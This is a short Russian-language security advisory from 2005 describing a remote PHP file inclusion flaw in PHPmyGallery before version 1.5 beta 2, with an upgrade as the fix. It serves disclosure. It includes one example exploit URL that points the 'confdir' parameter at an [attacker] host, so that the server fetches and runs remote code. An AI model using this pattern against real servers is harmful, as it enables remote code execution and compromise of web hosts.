PHP-инклюдинг в PHPmyGallery

Дата публикации:01.08.2005
Всего просмотров:1354
Опасность:
Высокая
Наличие исправления: Частично
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHPmyGallery 0.x
Уязвимые версии: PHPmyGallery версии до 1.5 beta 2

Описание:
Обнаруженная уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует в сценарии '/_conf/core/common-tpl-vars.php' при обработке входных данных в параметре 'confdir'. Удаленный пользователь может с помощью специально сформированного значения параметра выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/[patch-to-phpmygallery]/_conf/core/common-tpl-vars.php?confdir=http://[attacker]

URL производителя: phpmygallery.kapierich.net

Решение: Установите последнюю версию с сайта производителя.